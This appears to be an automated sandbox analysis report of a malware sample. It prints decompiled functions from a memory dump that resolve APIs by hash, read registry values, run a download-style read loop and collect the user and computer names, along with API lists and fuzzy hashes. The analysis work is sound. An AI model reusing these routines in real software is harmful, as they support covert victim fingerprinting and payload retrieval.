0x01008c9c
0x01008ca1
0x01008ca9
0x01008cab
0x01008cb0
0x00000000
0x01008cb2
0x01008cb2
0x01008cb7
0x01008cbf
0x01008cc1
0x01008cc6
0x00000000
0x01008cc8
0x01008cce
0x01008cd3
0x01008cda
0x01008cdf
0x01008ce4
0x00000000
0x01008ce6
0x01008ce9
0x01008ce9
0x01008ce4
0x01008cc6
0x01008cb0
0x01008c9a
0x01008c84
0x01008c6e
0x01008d03

APIs

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01005CCC,?,00000001,?,?,00000000,00000000), ref: 01008C45
GetProcAddress.KERNEL32(00000000,7243775A), ref: 01008C67
GetProcAddress.KERNEL32(00000000,614D775A), ref: 01008C7D
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01008C93
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01008CA9
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01008CBF

Part of subcall function 0100241F: memset.NTDLL ref: 0100249E

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 65a2720e9932ee8f6badaac341a15edc1f1599b447bc3fbd5bb7284a2b44ec2f
Instruction ID: 4a2efbbc0faadcd39e1a71dd0622431a2633fead318fc38179917968cfda9c43
Opcode Fuzzy Hash: 65a2720e9932ee8f6badaac341a15edc1f1599b447bc3fbd5bb7284a2b44ec2f
Instruction Fuzzy Hash: 762160B160160B9FE722EFADC944D9ABBFCFF14200F014466E689DB251DB74E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010094E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E010094E5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int _t85;
				void* _t95;
				void* _t96;
				char _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t96 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x100d33c);
					_t95 = 0x80000002;
					L6:
					_t60 = E01008ECC(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E010053BB(_t96, _t101, _t105, _t95, _t60) != 0) {
						L27:
						E01005DE8(_a8);
						goto L29;
					}
					_t65 =  *0x100d2a4; // 0x460a5a8
					_t16 = _t65 + 0x100e8fe; // 0x65696c43
					_t68 = E01008ECC(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t69 =  *_t29;
						_t33 = _t105 + 0x10; // 0x3d0100c0
						if(E01005C3B(_t101,  *_t33, _t95, _a8,  *0x100d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)(_t69 + 0x2c))) == 0) {
							_t71 =  *0x100d2a4; // 0x460a5a8
							if(_t102 == 0) {
								_t35 = _t71 + 0x100ea5f; // 0x4d4c4b48
								_t72 = _t35;
							} else {
								_t34 = _t71 + 0x100e89f; // 0x55434b48
								_t72 = _t34;
							}
							if(E01004B3D(_t72,  *0x100d334,  *0x100d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t74 =  *0x100d2a4; // 0x460a5a8
									_t44 = _t74 + 0x100e871; // 0x74666f53
									_t103 = E01008ECC(0, _t44);
									if(_t77 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d0100c0
										E01009D43( *_t47, _t95, _a8,  *0x100d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d0100c0
										E01009D43( *_t49, _t95, _t103,  *0x100d330, _a16);
										E01005DE8(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d0100c0
									E01009D43( *_t40, _t95, _a8,  *0x100d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d0100c0
									E01009D43( *_t43, _t95, _a8,  *0x100d330, _a16);
								}
								if( *_t105 != 0) {
									E01005DE8(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d0100c0
					_t85 = E0100386E( *_t21, _t95, _a8, _t68,  &_v16,  &_v12);
					if(_t85 == 0) {
						_t104 = _v16;
						if(_v12 == 0x28) {
							 *_t104 =  *_t104 & _t85;
							_t26 = _t105 + 0x10; // 0x3d0100c0
							E01005C3B(_t101,  *_t26, _t95, _a8, _a24, _t104, 0x28);
						}
						E01005DE8(_t104);
						_t102 = _a16;
					}
					E01005DE8(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t101 = _a8;
					E0100A899(_t102, _a8,  &_v284);
					__imp__(_t106 + _t102 - 0x117,  *0x100d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t95 = 0x80000003;
					goto L6;
				}
			}

0x010094e5
0x010094ee
0x010094f5
0x010094fa
0x01009567
0x0100956d
0x01009572
0x0100957b
0x01009580
0x01009585
0x010096f8
0x010096ff
0x010096ff
0x01009704
0x01009706
0x01009706
0x0100970f
0x0100970f
0x0100958b
0x01009597
0x010096ee
0x010096f1
0x00000000
0x010096f1
0x0100959d
0x010095a2
0x010095ab
0x010095b0
0x010095b5
0x010095fe
0x010095fe
0x010095fe
0x01009611
0x0100961b
0x01009621
0x01009628
0x01009632
0x01009632
0x0100962a
0x0100962a
0x0100962a
0x0100962a
0x01009654
0x0100965c
0x0100968a
0x0100968f
0x0100969d
0x010096a1
0x010096d3
0x010096a3
0x010096b0
0x010096b3
0x010096c3
0x010096c6
0x010096cc
0x010096cc
0x0100965e
0x0100966b
0x0100966e
0x01009680
0x01009683
0x01009683
0x010096dd
0x010096e9
0x010096df
0x010096e2
0x010096e2
0x010096dd
0x01009654
0x00000000
0x0100961b
0x010095c4
0x010095c7
0x010095ce
0x010095d4
0x010095d7
0x010095d9
0x010095e5
0x010095e8
0x010095e8
0x010095ee
0x010095f3
0x010095f3
0x010095f9
0x00000000
0x010095f9
0x010094ff
0x00000000
0x01009526
0x01009526
0x01009532
0x01009545
0x0100954b
0x01009553
0x00000000
0x01009553

APIs

StrChrA.SHLWAPI(0100A82A,0000005F,00000000,00000000,00000104), ref: 01009518
lstrcpy.KERNEL32(?,?), ref: 01009545

Part of subcall function 01008ECC: lstrlen.KERNEL32(?,00000000,0100D330,00000001,0100577D,0100D00C,0100D00C,00000000,00000005,00000000,00000000,?,?,?,01008880,0100197C), ref: 01008ED5
Part of subcall function 01008ECC: mbstowcs.NTDLL ref: 01008EFC
Part of subcall function 01008ECC: memset.NTDLL ref: 01008F0E

Part of subcall function 01009D43: lstrlenW.KERNEL32(?,?,?,010096B8,3D0100C0,80000002,0100A82A,010023DB,74666F53,4D4C4B48,010023DB,?,3D0100C0,80000002,0100A82A,?), ref: 01009D68

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

lstrcpy.KERNEL32(?,00000000), ref: 01009567

Strings

(, xrefs: 010095D0
\, xrefs: 0100954B

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 643b4a3253b48fbd6e1002f599152b7473df1c715687992ffa077badaf580620
Instruction ID: 3774e52d9451a6f510150e7278c2141b47e6241367a311df3ab0e310422f78e0
Opcode Fuzzy Hash: 643b4a3253b48fbd6e1002f599152b7473df1c715687992ffa077badaf580620
Instruction Fuzzy Hash: 0451703150020AEFEF23AFA4DD44DDA7BB9FF18308F008565F69996191D736DA15DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0100A96C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,74784D40), ref: 0100A97E

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

ResetEvent.KERNEL32(?), ref: 0100A9F2
GetLastError.KERNEL32 ref: 0100AA15
GetLastError.KERNEL32 ref: 0100AAC0

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

Strings

@MxtNxt, xrefs: 0100AA15, 0100AAC0

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID: @MxtNxt
API String ID: 943265810-1701360479
Opcode ID: b5b134ebd11168740864a41be07aab2952a590ea2d5926dec10d28535a0a42a9
Instruction ID: 2feafa33b52e8e72d735624e25c22a987170f640bc8d57ae47bf3a7a27130b97
Opcode Fuzzy Hash: b5b134ebd11168740864a41be07aab2952a590ea2d5926dec10d28535a0a42a9
Instruction Fuzzy Hash: D9416C71600704FBFB33AFA5DD48EAB7ABDEB89710F144959B582D20D0D731A644CB20

Uniqueness

Uniqueness Score: -1.00%

Function 01005574, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E01005574(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x100d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x100d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E010098E4(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x100d138() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E01005DE8(_v16);
							if(_t58 == 0) {
								_t58 = E0100214C(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E01001BC5( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E01001BC5( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}

0x01005574
0x01005583
0x01005588
0x0100558a
0x0100558f
0x01005590
0x01005595
0x01005596
0x010055a1
0x010055d2
0x010055d7
0x0100569a
0x0100569d
0x010056a3
0x010056a3
0x010055e4
0x010055ec
0x01005697
0x00000000
0x01005697
0x010055f7
0x010055fc
0x01005601
0x01005689
0x0100568a
0x0100568a
0x01005690
0x00000000
0x01005690
0x01005607
0x01005609
0x0100560f
0x01005610
0x01005610
0x01005613
0x01005616
0x0100561c
0x01005621
0x01005622
0x01005627
0x0100562a
0x01005635
0x00000000
0x00000000
0x0100563d
0x01005645
0x0100566e
0x01005671
0x01005678
0x01005683
0x01005683
0x00000000
0x01005678
0x01005651
0x01005655
0x00000000
0x00000000
0x01005657
0x0100565c
0x00000000
0x00000000
0x0100565e
0x0100565e
0x01005663
0x00000000
0x00000000
0x01005665
0x01005666
0x01005669
0x01005669
0x01005610
0x010055a9
0x010055b1
0x010055ca
0x010055cc
0x00000000
0x00000000
0x00000000
0x010055cc
0x010055bd
0x010055c1
0x00000000
0x00000000
0x010055c7
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 0100558A
GetLastError.KERNEL32 ref: 010055A3

Part of subcall function 01001BC5: WaitForMultipleObjects.KERNEL32(00000002,0100AA33,00000000,0100AA33,?,?,?,0100AA33,0000EA60), ref: 01001BE0

ResetEvent.KERNEL32(?), ref: 0100561C
GetLastError.KERNEL32 ref: 01005637

Strings

@MxtNxt, xrefs: 010055A3, 01005637

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID: @MxtNxt
API String ID: 2394032930-1701360479
Opcode ID: 33f0322197668d5d096ed984842689afb71488347ffbbcee9d8b7830013f9b26
Instruction ID: 7d25542f160c2f610eae09366916796d8f8d49837bd8563b3e7d476d85fdb16a
Opcode Fuzzy Hash: 33f0322197668d5d096ed984842689afb71488347ffbbcee9d8b7830013f9b26
Instruction Fuzzy Hash: E931B332600604AFEB239FA8DC44EAE77F9AF88360F1406A9E595D71D0EB71E9419F10

Uniqueness

Uniqueness Score: -1.00%

Function 01009208, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E01009208(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x100d140; // 0x100ad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E010098E4(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E01005DE8(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E01001BC5( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x01009208
0x01009208
0x01009212
0x01009218
0x0100921b
0x0100921f
0x01009225
0x0100922a
0x01009243
0x01009246
0x0100924a
0x0100924e
0x0100924f
0x01009254
0x01009257
0x0100925e
0x01009265
0x010092b8
0x010092be
0x010092c4
0x010092ff
0x01009305
0x00000000
0x00000000
0x00000000
0x010092c4
0x0100926b
0x00000000
0x01009272
0x01009280
0x01009283
0x01009286
0x01009292
0x01009296
0x010092f8
0x01009298
0x0100929b
0x0100929f
0x010092a0
0x010092a1
0x010092a3
0x010092aa
0x010092e8
0x010092f3
0x010092ac
0x010092af
0x010092b3
0x010092b3
0x010092aa
0x00000000
0x01009296
0x0100926b
0x0100922f
0x01009235
0x01009238
0x0100923d
0x00000000
0x00000000
0x00000000
0x010092cd
0x010092d5
0x010092da
0x010092dd
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,747C81D0), ref: 0100921F
SetEvent.KERNEL32(?), ref: 0100922F
GetLastError.KERNEL32 ref: 010092B8

Part of subcall function 01001BC5: WaitForMultipleObjects.KERNEL32(00000002,0100AA33,00000000,0100AA33,?,?,?,0100AA33,0000EA60), ref: 01001BE0

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

GetLastError.KERNEL32(00000000), ref: 010092ED

Strings

@MxtNxt, xrefs: 010092B8, 010092ED

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MxtNxt
API String ID: 602384898-1701360479
Opcode ID: f9cf187f33a77f51cb668229740f9056d80cc0ec89ce1b54086629948e379028
Instruction ID: 577cd80004fd6a0f5f157e6be5a44942a61e5d63ec7ac117e5500160643ba02d
Opcode Fuzzy Hash: f9cf187f33a77f51cb668229740f9056d80cc0ec89ce1b54086629948e379028
Instruction Fuzzy Hash: 113124B5900709EFEB22DFA5C9C499EBBF8FB04304F1049BAE686A2181D7319A44DF50

Uniqueness

Uniqueness Score: -1.00%

Function 01001D3E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E01001D3E(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x100d32c; // 0x56195b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x100d32c; // 0x56195b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x100d030) {
					HeapFree( *0x100d238, 0, _t8);
				}
				_t14[1] = E0100769A(_v0);
				_t11 =  *0x100d32c; // 0x56195b0
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x01001d3e
0x01001d3e
0x01001d47
0x01001d57
0x01001d57
0x01001d5c
0x01001d61
0x00000000
0x00000000
0x01001d51
0x01001d51
0x01001d63
0x01001d67
0x01001d79
0x01001d79
0x01001d89
0x01001d8c
0x01001d91
0x01001d95
0x01001d9b

APIs

RtlEnterCriticalSection.NTDLL(05619570), ref: 01001D47
Sleep.KERNEL32(0000000A,?,01001971), ref: 01001D51
HeapFree.KERNEL32(00000000,00000000,?,01001971), ref: 01001D79
RtlLeaveCriticalSection.NTDLL(05619570), ref: 01001D95

Strings

Uxt, xrefs: 01001D79

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: e627722a5798f661df57758e0526f9a04b69e558fa113785161d9d51f1a8e425
Instruction ID: 9c6f3e7e993d5e137519ad406e66bf3f17b7eccb1ef9383d3eeff8633d95e263
Opcode Fuzzy Hash: e627722a5798f661df57758e0526f9a04b69e558fa113785161d9d51f1a8e425
Instruction Fuzzy Hash: 06F034706002409BF733EBF8DA48B2A77E9AB15340F048541F6C2C6298C639E800CB25

Uniqueness

Uniqueness Score: -1.00%

Function 010098F9, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E010098F9() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x100d32c; // 0x56195b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x100d32c; // 0x56195b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x100d32c; // 0x56195b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x100e836) {
					HeapFree( *0x100d238, 0, _t10);
					_t7 =  *0x100d32c; // 0x56195b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x010098f9
0x01009902
0x01009912
0x01009912
0x01009917
0x0100991c
0x00000000
0x00000000
0x0100990c
0x0100990c
0x0100991e
0x01009923
0x01009927
0x0100993a
0x01009940
0x01009940
0x01009949
0x0100994b
0x0100994f
0x01009955

APIs

RtlEnterCriticalSection.NTDLL(05619570), ref: 01009902
Sleep.KERNEL32(0000000A,?,01001971), ref: 0100990C
HeapFree.KERNEL32(00000000,?,?,01001971), ref: 0100993A
RtlLeaveCriticalSection.NTDLL(05619570), ref: 0100994F

Strings

Uxt, xrefs: 0100993A

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: 89d331b887b389c73044fd7df4d117f862c12c6a773304260fefe581e19b7109
Instruction ID: ce5119c1bbc227d0d801a36b5c9678eb9ca278246e563e85fb7815ac49f10a14
Opcode Fuzzy Hash: 89d331b887b389c73044fd7df4d117f862c12c6a773304260fefe581e19b7109
Instruction Fuzzy Hash: D4F03A746001019FF727CBE8D948F2977E0AB09300F048144F9CAC7299C739A800CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0100A0B7, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100A0B7() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E010098E4(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E01005DE8(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x1005f3a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x0100a0c5
0x0100a0c8
0x0100a0cb
0x0100a0d1
0x0100a0d6
0x0100a0dc
0x0100a0e4
0x0100a0e7
0x0100a0ed
0x0100a0f2
0x0100a0ff
0x0100a10c
0x0100a110
0x0100a112
0x0100a116
0x0100a119
0x0100a129
0x0100a17c
0x0100a17d
0x0100a12b
0x0100a130
0x0100a131
0x0100a136
0x0100a139
0x0100a14c
0x00000000
0x0100a14e
0x0100a151
0x0100a156
0x0100a164
0x0100a167
0x0100a16d
0x0100a172
0x00000000
0x0100a174
0x0100a174
0x0100a177
0x0100a177
0x0100a172
0x0100a14c
0x0100a182
0x0100a183
0x0100a0f2
0x0100a189

APIs

GetUserNameW.ADVAPI32(00000000,01005F38), ref: 0100A0CB
GetComputerNameW.KERNEL32(00000000,01005F38), ref: 0100A0E7

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

GetUserNameW.ADVAPI32(00000000,01005F38), ref: 0100A121
GetComputerNameW.KERNEL32(01005F38,?), ref: 0100A144
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,01005F38,00000000,01005F3A,00000000,00000000,?,?,01005F38), ref: 0100A167

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 8b14115cabd419a1dba1f4381fc43923a84115d5fa2583d0a8a7eb2d81aa568d
Instruction ID: f15619d99752d3cceebe1a0955fd47ec5285f29d6d9ddd2a6ec3bb5e142e7de5
Opcode Fuzzy Hash: 8b14115cabd419a1dba1f4381fc43923a84115d5fa2583d0a8a7eb2d81aa568d
Instruction Fuzzy Hash: 5A21DB76A00209FFEB12DFE8C9849EEBBB8EF45244F5044AAE645E7240DA349B45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E15282C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E152838

Part of subcall function 6E148902: __FF_MSGBANNER.LIBCMT ref: 6E148919
Part of subcall function 6E148902: __NMSG_WRITE.LIBCMT ref: 6E148920
Part of subcall function 6E148902: RtlAllocateHeap.NTDLL(6E28E9EC,00000000,00000001), ref: 6E148945

_free.LIBCMT ref: 6E15284B

Memory Dump Source

Source File: 00000003.00000002.597621733.000000006E110000.00000020.00020000.sdmp, Offset: 6E110000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 216b82f7efe333243468970502841e62da48b8f60344925f3d6965ae999b9e1a
Instruction ID: 9eb56cd71f1971cfb43a82e489d1386c47c9c2edfec92ed14304074a56494882
Opcode Fuzzy Hash: 216b82f7efe333243468970502841e62da48b8f60344925f3d6965ae999b9e1a
